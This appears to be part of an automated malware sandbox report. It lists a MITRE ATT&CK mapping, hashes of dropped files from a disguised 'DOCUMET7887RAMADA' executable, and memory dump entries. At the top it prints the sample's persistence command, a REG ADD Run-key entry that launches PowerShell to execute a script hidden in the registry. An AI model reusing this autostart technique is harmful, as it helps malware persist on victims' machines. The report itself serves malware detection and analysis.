        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bemixt" /t REG_EXPAND_SZ /d "%Teknologiseringerne% -windowstyle 1 $Graensefunktion=(Get-Item 'HKCU:\Software\Genindlggelsen\').GetValue('Pvc');%Teknologiseringerne% ($Graensefunktion)"
        5⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:1268

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" h -scrcSHA256 -i#7zMap32440:152:7zEvent18347
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1096

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199

Filesize
854B

MD5
e935bc5762068caf3e24a2683b1b8a88

SHA1
82b70eb774c0756837fe8d7acbfeec05ecbf5463

SHA256
a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d

SHA512
bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
5ed79b00d1de64be75e0bfa8f31b4ff5

SHA1
a0c4947d1c7faed9779df1c9b96c3aafd15195c1

SHA256
80f0d0f677ba2ace4202ce17d31980b63b21fb9dc4d099819cb9ebf08bf810a8

SHA512
84e8f4bc07beb71264930f17117e54a6c549c473e412c9dd84dde5baacd2a5a647e982002761706a475685c36758ddc8695999c5613e8015e55ef5a4d1f653c6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199

Filesize
170B

MD5
75b07c842a5fc18014e442f0f39636c6

SHA1
ed3443b4d1bdffd06dc705da39f54803eecf0284

SHA256
0239455c9e381f9f44939efa5076f56bffbbf87bab58bc32c39d265b07e6b4da

SHA512
40571bdb47f140c13dd07cd7e47de8b0516b4349a26a07eaeedf157796d543b5748fecbe52ef51c7ddba5fd5fc0b4351d0a493e08e6094c089fba943f185d03a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
633f2f92085757ae9b3fa7dea235acef

SHA1
6ad5f82085b485957822a321d1c3a7b48c696111

SHA256
f1f0a7a5f99540f0a19442d76db2ec6786a12b1e15bf50cd494de9992eb96d1b

SHA512
6a4cb84027249810eaf05d7adbe1e0e765c0b4ca0531f65842181b615da3fa663b66f378517a08aec89057b07eea55077ec473f6dcdfc179426543c70c6ef9c2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
99afa4934d1e3c56bbce114b356e8a99

SHA1
3f0e7a1a28d9d9c06b6663df5d83a65c84d52581

SHA256
08e098bb97fd91d815469cdfd5568607a3feca61f18b6b5b9c11b531fde206c8

SHA512
76686f30ed68144cf943b80ac10b52c74eee84f197cee3c24ef7845ef44bdb5586b6e530824543deeed59417205ac0e2559808bcb46450504106ac8f4c95b9da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
443a627d539ca4eab732bad0cbe7332b

SHA1
86b18b906a1acd2a22f4b2c78ac3564c394a9569

SHA256
1e1ad9dce141f5f17ea07c7e9c2a65e707c9943f172b9134b0daf9eef25f0dc9

SHA512
923b86d75a565c91250110162ce13dd3ef3f6bdde1a83f7af235ed302d4a96b8c9ed722e2152781e699dfcb26bb98afc73f5adb298f8fd673f14c9f28b5f764d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000017

Filesize
215KB

MD5
d79b35ccf8e6af6714eb612714349097

SHA1
eb3ccc9ed29830df42f3fd129951cb8b791aaf98

SHA256
c8459799169b81fdab64d028a9ebb058ea2d0ad5feb33a11f6a45a54a5ccc365

SHA512
f4be1c1e192a700139d7cff5059af81c0234ed5f032796036a1a4879b032ce4eedd16a121bbf776f17bc84a0012846f467ad48b46db4008841c25b779c7d8f5a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
2382782dca686ca02d66c3fffb576c8c

SHA1
e34bc85fe6a84aaac53d1ce8e9b70baa55a55eb3

SHA256
36a0b39ac3979fd0f98a414e53d80a77f370428fbf958b2860c44ecff17ac23c

SHA512
704e1a9fa941a7dc51af012feb5f3e84cbb96ba50c9f3f5f37f8ac5ab997f8f0c520f2f6c60656631de8af284b130ce4d3663febb9b21284661ffd9545ac4940

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
8aa99671f84778b51dba246655ff768b

SHA1
198aac99d8c12a00fc9a792b1ed292650ec3ffbd

SHA256
ff3418224f2eddcd1bfbf1617eb7a97d6f2ac4367a378c0f49c4785984cd78cc

SHA512
e4e4b9321b4f96cd6e9d67c89666242224b47dec3de80b9aff4495c55f3e07cea59729c66351775c655a5d295ffb6750b01c43e13c4b6ccc7b755e2ff773fae4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
e5d18901647beb3635ebd22a395cc72c

SHA1
218167938b4ca14fcc1c82b2962034663fccbebd

SHA256
294a2ac5259de06ecef62a887f28a452454a06b4c1551d8fbd8069a167fc7bd6

SHA512
eb39791edcf97a863c00079fb2f31be9ee77736d65138a4f0dfb4b1c76d5f0d349dd941b86daeabf6db443a615a0e14bea15020c83ac0f07038a316c8a62a3c0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
601d8e2b8d8da8d414082f06259e24d0

SHA1
3cdee28ae5278dcfb80728606cfe98996b4917f5

SHA256
e6fb61ce88546d53caae5a72b4e2868c21e3f29feb19a3d3e25348a4c6794629

SHA512
b83e48de44bb73ca343199642ab6db23225f5659a925e30be233cda2ac2b3e0a18a10d37620462844f22e446fb2e9ed115583bdd907f2bd8f1c591378a82e934

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
98c7c91b83af1737ec04656015e98979

SHA1
8fd8d6caeb63a98145c4b9cbc082b220dcd84544

SHA256
5449375256a9e59d8b1cadc809f3a31e6b6e52cc9c03bcdbfa179fb254747311

SHA512
47d7197eccfec9309d4828ae56238df8a0ef8d451cb6a9726cb346927d1cf55c2e06040b68d4df7f37dc474dc95a648ae7d548cda6bd710c6a0071414ea02597

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t4weqrp5.fph.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Brixvold\reclusely\Flanr.fje

Filesize
331KB

MD5
06acea567a0ded05680dbb9de58d0311

SHA1
e84e2cde7049ce616b5cc579ce4b4d837423e586

SHA256
fd3f116786b5db01589d0460c9e1ffccdc468237ee2db9941482c904bc20500b

SHA512
e5c9492b5c49f75c92f45c9b577d67854d989e5672cfc3c2f8b4e831b00082f180834080e398bef69dcd0d3611d4404879e4b6ee9ef57afb2c421ea7f422bc14

Download Submit
C:\Users\Admin\AppData\Roaming\Brixvold\reclusely\Krieker213.Fla

Filesize
56KB

MD5
71ec49d3afc6876b0238400570d4028d

SHA1
e661e5ca92fa77b576dd75c8d981936b2db5be88

SHA256
178d63022c2e5d42cd6f8dd983b8a4a19568e1370efad6c9c51f4b8807964885

SHA512
dae10533f8b54e5dcd1e929a2af3270f201e22566961d27ef4c52ad359b821a4b95bab5469047fe61271111876208833450010d8cf1ce9bd73edcd829d6f21e2

Download Submit
C:\Users\Admin\Downloads\DOCUMET7887RAMADA@#$@!.LZH

Filesize
957KB

MD5
742fd2d536c1c39b9642ed7ac36a7f9d

SHA1
bee1a00ac3118c2091a9d7f0dcfb9615a5959a65

SHA256
6de871bf2603f04e1220e654d5fe2f6c5103ffc0f6a542ac1f1187b4482ebfef

SHA512
654d63050d7a65d0dfaa08b3dfb6f1f0e19e7788f064c84cba3c12f5017c9214fece4912e89e8f95d62d9187887483cb2eba849b16c3ad825b22a854b78b2141

Download Submit
C:\Users\Admin\Downloads\DOCUMET7887RAMADA@#$@!\DOCUMET7887RAMADA@#$@!.exe

Filesize
1.2MB

MD5
6dbfced7845c936a56c3685329dc24d9

SHA1
416db985d9b8defa1b99d17956aae3d767d9d92b

SHA256
304947e91f66751b25d0899c7b9feffe43a5620b13fd5de4a8c5642d638ce45f

SHA512
9ca83f6d19299abdfa872713d3646737e6319ef4c422d0af7c9bbd237a199f058126f05a451c91057970ac000d885b35b34fd3d46307947ee67847af6dca96f4

Download Submit
C:\Users\Admin\Downloads\DOCUMET7887RAMADA@#$@!\DOCUMET7887RAMADA@#$@!\dendropogon.txt

Filesize
500B

MD5
c3c83ef0066fd6b16972dcfb515aefcc

SHA1
49f44118eefd3b99e3d5645a8dcb275e4c521cbd

SHA256
86196759cefcbb191c5bab56d5758c9630d8b2a0e3a890c975ebabb4474473a9

SHA512
c0591a56ead4c5a64dff27695077a3f62f34fe3848b670c0322f00afa0f6a17e2f9c09e9094818123c7f54a995c9a2b9478fd72257bfcef52596994fb97cf7cd

Download Submit
memory/2436-233-0x0000000000C40000-0x0000000001E94000-memory.dmp

Filesize
18.3MB

Download
memory/2436-232-0x0000000000C40000-0x0000000001E94000-memory.dmp

Filesize
18.3MB

Download
memory/2436-225-0x0000000000C40000-0x0000000001E94000-memory.dmp

Filesize
18.3MB

Download
memory/2436-223-0x0000000000C40000-0x0000000001E94000-memory.dmp

Filesize
18.3MB

Download
memory/2436-250-0x0000000000C40000-0x0000000001E94000-memory.dmp

Filesize
18.3MB

Download
memory/5096-184-0x00000000083B0000-0x0000000008A2A000-memory.dmp

Filesize
6.5MB

Download
memory/5096-185-0x0000000007530000-0x0000000007562000-memory.dmp

Filesize
200KB

Download
memory/5096-186-0x0000000070820000-0x000000007086C000-memory.dmp

Filesize
304KB

Download
memory/5096-196-0x0000000007510000-0x000000000752E000-memory.dmp

Filesize
120KB

Download
memory/5096-197-0x0000000007580000-0x0000000007623000-memory.dmp

Filesize
652KB

Download
memory/5096-198-0x00000000076A0000-0x00000000076AA000-memory.dmp

Filesize
40KB

Download
memory/5096-199-0x00000000076C0000-0x00000000076D1000-memory.dmp

Filesize
68KB

Download
memory/5096-200-0x0000000007710000-0x000000000771E000-memory.dmp

Filesize
56KB

Download
memory/5096-201-0x0000000007720000-0x0000000007734000-memory.dmp

Filesize
80KB

Download
memory/5096-202-0x0000000007760000-0x000000000777A000-memory.dmp

Filesize
104KB

Download
memory/5096-203-0x0000000007750000-0x0000000007758000-memory.dmp

Filesize
32KB

Download
memory/5096-204-0x0000000007EA0000-0x0000000007ECA000-memory.dmp

Filesize
168KB

Download
memory/5096-205-0x0000000007ED0000-0x0000000007EF4000-memory.dmp

Filesize
144KB

Download
memory/5096-182-0x0000000007780000-0x0000000007D24000-memory.dmp

Filesize
5.6MB

Download
memory/5096-208-0x0000000008A30000-0x000000000A62F000-memory.dmp

Filesize
28.0MB

Download
memory/5096-181-0x0000000006680000-0x00000000066A2000-memory.dmp

Filesize
136KB

Download
memory/5096-180-0x0000000006630000-0x000000000664A000-memory.dmp

Filesize
104KB

Download
memory/5096-179-0x00000000070F0000-0x0000000007186000-memory.dmp

Filesize
600KB

Download
memory/5096-178-0x0000000006160000-0x00000000061AC000-memory.dmp

Filesize
304KB

Download
memory/5096-177-0x0000000006130000-0x000000000614E000-memory.dmp

Filesize
120KB

Download
memory/5096-167-0x0000000005CA0000-0x0000000005FF4000-memory.dmp

Filesize
3.3MB

Download
memory/5096-157-0x0000000005B30000-0x0000000005B96000-memory.dmp

Filesize
408KB

Download
memory/5096-156-0x0000000005A50000-0x0000000005AB6000-memory.dmp

Filesize
408KB

Download
memory/5096-155-0x00000000058B0000-0x00000000058D2000-memory.dmp

Filesize
136KB

Download
memory/5096-154-0x0000000005250000-0x0000000005878000-memory.dmp

Filesize
6.2MB

Download
memory/5096-153-0x0000000004B60000-0x0000000004B96000-memory.dmp

Filesize
216KB

Download